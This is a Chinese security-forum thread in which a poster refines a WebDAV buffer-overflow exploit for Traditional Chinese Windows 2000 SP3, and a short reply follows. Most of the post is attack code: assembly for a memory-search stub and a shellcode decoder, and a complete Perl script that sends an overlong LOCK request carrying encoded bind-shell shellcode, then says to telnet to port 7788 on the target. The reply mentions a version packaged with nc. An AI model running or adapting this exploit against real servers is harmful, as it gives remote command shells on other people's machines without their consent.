|
![]() | 作者: hacker521 [hacker521]
![]() |
登录 |
Webdav漏洞ISNO方法的补充~~ 作者:Nanika 首先必须先感谢ISNO的指导,和袁哥的文章,我把我研究的结果,跟大家报告一下, ISNO的方法很好,他把真正绑定Port的shellcode放在最后 print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1\r\n"; print $socket "Host: $host\r\n"; print $socket "Content-Type: text/xml\r\n"; print $socket "Content-length: 808\r\n\r\n"; print $socket "$tag$shell\r\n"; 然后利用袁哥所写的 http://www.nsfocus.net/index.php?act=sec_self&do=view&doc_id=646 把ISNO所写的 add esi, 1000h jmp loadmem lookupN: add esi, 4000h loadmem: mov eax, [esi] cmp eax, 4e4e4e4eh ;搜索含NNNN的内存,提高搜索效率 jnz lookupN add esi, 4 lookupYXYX: mov al, byte ptr [esi] inc esi cmp al, 59h ;在后面搜索YXYX,这是我们放在shellcode前面用来定位的 jnz lookupYXYX mov al, byte ptr [esi] inc esi cmp al, 58h jnz lookupYXYX lodsw cmp ax, 0x5859 jnz lookupYXYX jmp esi ;搜索到以后就跳到shellcode去执行 这一段编码 但我们还需要一段译码的程序 袁哥所写的 对shellcode解�a代码的汇编代码�s void shellcodefnlock() { _asm{ nop nop nop nop nop nop nop nop unlockdataw: nop push ebx /* 可以通用 push esp */ pop esi loopload: lodsw cmp ax,0x6099 // SHELLDATA jnz loopload push esi push esi push esi pop edi looplock: lodsw cmp ax,NOPCODE jz toshell nop sub al,DATABASE nop push eax pop ecx lodsw nop sub al,DATABASE lea edx,dword ptr [eax+ecx*4+0x70] lea edx,dword ptr [edx+ecx*4-0x70] lea edx,dword ptr [edx+ecx*4+0x70] lea edx,dword ptr [edx+ecx*4-0x70] push edx pop eax /* temp=shellcodefnadd[j]; buff[OVERADD+offset+2*j]=DATABASE+temp/0x10; buff[OVERADD+offset+2*j+1]=DATABASE+temp%0x10; 的逆运算�o但这儿是双字节形式 就是0xa*0x10+0xb=0xab这么个算法�o为了迁就指令范围弄得这么复杂 */ stosb jz looplock jnz looplock nop toshell: pop eax push eax push eax push eax ret nop _emit(0x99) _emit(0x60) _emit(0x0) _emit(0x0) _emit(0x0) _emit(0x0) NOP NOP NOP NOP NOP NOP NOP NOP } } 但是~~我在测试时发现~~这一段在繁体中文版中~~没有办法通用~~ 有很多字符没有办法正确的解�a 于是我花了很多时间~~写了一个~~繁体中文版的译码程序 _Nanikalock2: 00421B9C 53 push ebx 00421B9D 5E pop esi 00421B9E 90 nop 00421B9F 66 AD lods word ptr [esi] 00421BA1 EB 01 jmp _Nanikalock2+8 (00421ba4) 00421BA3 90 nop 00421BA4 90 nop 00421BA5 66 3D 58 59 cmp ax,offset _Nanikalock2+0Bh (00421ba7) 00421BA9 75 F4 jne _Nanikalock2+3 (00421b9f) 00421BAB 90 nop 00421BAC 56 push esi 00421BAD 5F pop edi 00421BAE 90 nop 00421BAF 66 AD lods word ptr [esi] 00421BB1 EB 01 jmp _Nanikalock2+18h (00421bb4) 00421BB3 90 nop 00421BB4 90 nop 00421BB5 66 3D 4F 00 cmp ax,offset _Nanikalock2+1Bh (00421bb7) 00421BB9 74 3C je _Nanikalock2+5Bh (00421bf7) 00421BBB 90 nop 00421BBC 2C 61 sub al,61h 00421BBE 50 push eax 00421BBF 59 pop ecx 00421BC0 90 nop 00421BC1 66 AD lods word ptr [esi] 00421BC3 EB 01 jmp _Nanikalock2+2Ah (00421bc6) 00421BC5 90 nop 00421BC6 2C 61 sub al,61h 00421BC8 50 push eax 00421BC9 5A pop edx 00421BCA 8D 54 8A 70 lea edx,[edx+ecx*4+70h] 00421BCE 8D 54 8A 90 lea edx,[edx+ecx*4-70h] 00421BD2 8D 54 8A 70 lea edx,[edx+ecx*4+70h] 00421BD6 8D 54 8A 90 lea edx,[edx+ecx*4-70h] 00421BDA 52 push edx 00421BDB 58 pop eax 00421BDC AA stos byte ptr [edi] 00421BDD 51 push ecx 00421BDE 90 nop 00421BDF 59 pop ecx 00421BE0 90 nop 00421BE1 90 nop 00421BE2 90 nop 00421BE3 90 nop 00421BE4 90 nop 00421BE5 74 C8 je _Nanikalock2+13h (00421baf) 00421BE7 EB C6 jmp _Nanikalock2+13h (00421baf) 00421BE9 EB 01 jmp _Nanikalock2+50h (00421bec) 00421BEB 90 nop 00421BEC 90 nop 00421BED 90 nop 00421BEE 90 nop 00421BEF 90 nop 00421BF0 90 nop 00421BF1 90 nop 00421BF2 90 nop 00421BF3 90 nop 00421BF4 90 nop 00421BF5 90 nop 00421BF6 90 nop 00421BF7 90 nop 00421BF8 90 nop 00421BF9 EB 05 jmp _Nanikalock2+64h (00421c00) 00421BFB 90 nop 00421BFC 90 nop 00421BFD 90 nop 00421BFE 58 pop eax 00421BFF 59 pop ecx 这一段的程序~~是利用袁哥所写的构想~~ 经过我的测试~~繁体中文或是简体中文~也可以省略那一段搜索SHELLCODE的程序~~ 我们可以直接~~利用袁哥的编码~~把绑定cmd的shellcode编码~~ 然后建构在译码程序之后~~~ 详细请参考最后的Exploit~~ 我觉得现在大家所发出来的EXPLOIT都没有办法可以很有效的通用~~ 原因在于编码方式的不同~~和SHELLCODE定位困难~等等问题~~ 我只是初学者~~写这篇的目的~~希望可以抛砖引玉~~让各位高手~~可以研究出~~通用在各种版本的利用方法~~ 繁体中文版的 exploit #!/usr/bin/perl #use call ebx as the ret #test on Chinese Big5 Win2k sp3 #by Nanika@seed.net.tw minjack.tw@yahoo.com.tw #thanks isno,yuange use IO::Socket; if ($#ARGV<1){die "webdavx.pl IP offset\r\noffset: 0-7\r\n";} $host = @ARGV[0]; $port = 80; $offset = @ARGV[1]; $decode = "%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090". "%u5e53%u6690%uebad%u9001%u6690%u583d%u7559%u90f4". "%u5f56%u6690%uebad%u9001%u6690%u4f3d%u7400%u903c". "%u612c%u5950%u6690%uebad%u9001%u612c%u5a50%u548d". "%u708a%u548d%u908a%u548d%u708a%u548d%u908a%u5852". "%u51aa". #decoder code #66 bytes "%u5990%u9090%u9090%u7490%uebc8%uebc6%u0590%u9090". "%u9090%u9090%u9090%u9090%u9090%ueb90%u9005%u9090". "%u5958"; $sc = "jaoladfnolafoipippppppidmfbfjajajailmfddmjggljbaadfaiadajheaocpk". "hoiojfjhjhmnbmenbehmjapngimepddgjhjhjhjhmhpdbolcjhjhjhjhkeemcmjh". "jhhhoahpeljgjhjhbggmjhjhgicijibefjjgjhjhbgfejhjhjgjhpbbgkmnkmnoc". "hakefhbmnekljefepbbgkpmhncoceobefhopbmkhjegebmnjjljefmbgkonmncmf". "njocfcbgoojdncnlkekfocclkegibmnblhjefebmfmjejpbgkonapcodmhocjobg". "oojdofpipengodjbnabefhjdhmhcjegijegmbmmbldjegnkeefpbbmiabmgnbmnb". "ihnpjegpkefobmfijefojefojenjiljefmbmkojegmhopojgjhjhmjbagabmeake". "fhgaehbmfpgfdibokfbknfjpmfmhmegiifmnbonfjdbkoficmfmbgimfjdmnkefh". "dlbdfhocgokefobnjjbdfoodjomfmbmegiifmndmhfhpnbmfmbgimfjdmnbmepke". "fhdlbdfhocgokefobnjjbhgojfodjomfmbmegiifmndmhfhakefhmhnhmhnhmhgi". "mahpaepnihmbmegimahlpnjfmegimaghkefhmamhchjldmmpdmnhdmminpmhmamb". "dkmbgimafhnpmhmadkmbdkmbgimafhnpchndbojamagimafdkefhbmnbgdbonakl". "bonanhbmjbbonakpkefhpbcpjgjgbonallmamakefhmhmhmhnhmhnpmhmhdkmbke". "fhmhgimafpgiobghgimaflgiobglgimaflnpmhmhmegimagdbmepkefhcdjdmhfg". "hpjdmhgimaedbmghkefhbmfpccjdmhmhmamgmbgioadpgimaehbekijgollfkefh". "mhmagikambgioadpgimaeljmfhodlikefhmhgikambmegimagppnmhgimahhhmfp". "kefhmhcdjdmhmbmegimaglmakefomgmhmbgioadlgimaeppnmhgimahhhmdnmhgi". "mahdhmgjmpmhbonfgffebmndldjljccpjhjhjhfajhopmbkdifkefhfehmhlhphf". "gkgigihpafgjgiginmmbhaoalebhhaoanlpipgpdnlpopfofpgofoongjhnmncmf". "njncnlkekfjhneofpcpgodpcmhpoohpcjhnapcodmeodpgofodocohnopjpbping". "jhneofpcpgodpcmhofpipepcoeoengjhneplpioepcnppgpjpdplpcjhmhpcpcpm". "njpgpkpcpdmhpoohpcjhnaplpipfpgplngplplpipejhmaofpoodpcnbpoplpcjh". "mfpcpgpdnbpoplpcjhmeplpcpcohjhncoppoodmhofpipepcoeoejhjhmamenine". "nmkekfjhoepipepmpcodjhpfpopjpdjhplpooeodpcpjjhpgpepepcohodjhoepc". "pjpdjhofpcpeobjhjfjhijpljhjhjhjhjhjhjhjhjhjhjhjhpepkpdljpcoppcjh". "gigigigi"; #code to find the real shellcode #1608 byes $num = 266+$offset; $bf = "A" x $num; $ret = "%u6e53%ueb06%ueb06%u2191" x 8; #call ebx addr 0x6e532191 $n = 63549; $buf = "O" x $n; $tag = "YXYX"; $shell ="AAAA"; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type =>SOCK_STREAM) or die "Couldn't connect: @!\n"; print $socket "LOCK /$bf$ret$decode$sc$buf HTTP/1.1\r\n"; print $socket "Host: $host\r\n"; print $socket "Content-Type: text/xml\r\n"; print $socket "Content-length: 8\r\n\r\n"; print $socket "$tag$shell\r\n"; print "send buffer...\r\n"; print "telnet target 7788\r\n"; print "if fail, try other offset(0-7)\r\n"; print "test on Chinese Big5 Win2k sp3\r\n"; print "by Nanika@seed.net.tw minjack.tw@yahoo.com.tw\r\n"; print "thanks isno, yuange\r\n"; close($socket); 若是失败~~可以调整offset~~或是跟改call ebx的地址 |
地主 发表时间: 07/20 07:03 |
![]() | 回复: junjuntop [junjuntop] ![]() |
登录 |
现在有个整合nc的 用起来比较方便 还是中文的 |
B1层 发表时间: 07/26 19:31 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号